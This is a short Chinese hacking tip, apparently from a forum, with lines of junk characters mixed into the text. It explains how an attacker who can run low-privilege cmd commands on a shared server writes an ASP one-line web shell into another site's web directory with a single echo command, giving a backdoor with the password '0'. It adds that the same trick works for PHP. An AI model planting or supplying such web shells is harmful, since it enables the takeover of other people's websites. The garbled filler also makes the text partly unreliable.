在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。& Y+ A1 H: F8 \% o3 s E
K& F5 ^. W/ d6 U命令格式
6 F1 l4 E% g; I9 x6 ]
R- p5 o6 ]+ G+ k& V; d( bEcho 语句 >目标站绝对目录
8 l! e( C. F1 ^6 Z1 E
( S. [3 u2 ~& n# G0 {3 u例如: / `* c3 q/ h/ l' t% n3 B$ f
7 N3 b+ O3 G7 F, i
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp2 R0 p; f- U' s+ u
5 z" C1 d+ I3 s2 W4 _" T这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。/ L9 C2 z9 \& b- _; J. G& ~
|